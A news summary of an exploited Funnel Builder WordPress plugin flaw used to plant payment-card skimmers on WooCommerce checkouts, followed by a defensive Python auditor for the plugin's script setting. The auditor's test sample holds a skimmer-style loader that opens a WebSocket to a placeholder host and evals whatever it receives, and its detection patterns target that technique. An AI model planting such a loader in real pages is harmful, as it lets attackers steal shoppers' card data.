WordPress Funnel Builder vulnerability exploited to steal payment data

A critical vulnerability in the WordPress Funnel Builder plugin was actively exploited, allowing attackers to inject malicious JavaScript into WooCommerce checkout pages and steal customer payment information. The flaw, which affects all versions prior to 3.15.0.3, can be exploited without authentication, Bleeping Computer reports.

The vulnerability in the Funnel Builder plugin, used by over 40,000 websites, allows unauthenticated attackers to modify global settings via an unprotected checkout endpoint. This enables the injection of arbitrary JavaScript into the plugin's "External Scripts" setting, leading to malicious code execution on every checkout page. Security company Sansec detected the attacks, noting that the payload disguised itself as a legitimate analytics script to establish a WebSocket connection to an attacker-controlled server. This server then delivers a payment card skimmer designed to steal credit card numbers, CVVs, billing addresses, and other customer data.

FunnelKit released version 3.15.0.3 to address the vulnerability and recommended that all users update immediately and review their external scripts for any rogue additions.
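The review FunnelKit recommends can be partly automated. The following is an added example (not code from the plugin, FunnelKit, Sansec or the article): it takes the HTML stored in the "External Scripts" setting, flags script tags whose host is not on an operator-maintained allowlist, and flags inline code that opens a WebSocket, loads scripts dynamically or evaluates remote data, the traits of the skimmer loader described above. The allowlist, the sample setting and the hostnames in it are assumptions constructed for the example.

```python
import re
from urllib.parse import urlparse

# Hosts the operator expects in the setting (assumption; adjust per site).
TRUSTED_SCRIPT_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)

# Inline behaviours that a checkout "analytics" snippet has no reason to show.
SUSPICIOUS_INLINE = {
    "opens a WebSocket": re.compile(r"new\s+WebSocket\s*\(|\bwss?://", re.I),
    "loads a script dynamically": re.compile(r"createElement\s*\(\s*['\"]script['\"]", re.I),
    "evaluates remote data": re.compile(r"\beval\s*\(|new\s+Function\s*\(", re.I),
}


def audit_external_scripts(setting_html, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Return (reason, evidence) pairs for every script tag that needs a manual look."""
    findings = []
    for attrs, body in SCRIPT_TAG.findall(setting_html):
        src = SRC_ATTR.search(attrs)
        if src:
            host = (urlparse(src.group(1)).hostname or "").lower()
            if host not in trusted_hosts:
                findings.append(("untrusted script host", src.group(1)))
        for reason, pattern in SUSPICIOUS_INLINE.items():
            hit = pattern.search(body)
            if hit:
                findings.append((reason, hit.group(0)))
    return findings


# Constructed sample: one legitimate tag plus an inline snippet dressed up as
# analytics that opens a socket to a placeholder host and runs what it receives.
SAMPLE_SETTING = """
<script src="https://www.googletagmanager.com/gtag/js"></script>
<script>
  /* analytics bootstrap */
  var ws = new WebSocket("wss://analytics-cdn.example.invalid/collect");
  ws.onmessage = function (m) { eval(m.data); };
</script>
"""

if __name__ == "__main__":
    for reason, evidence in audit_external_scripts(SAMPLE_SETTING):
        print(f"REVIEW: {reason}: {evidence}")
```

The script only reads a copy of the setting; pulling it out of the database and putting the result into a scheduled check is left to the site's own tooling.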

Source: Bleeping Computer
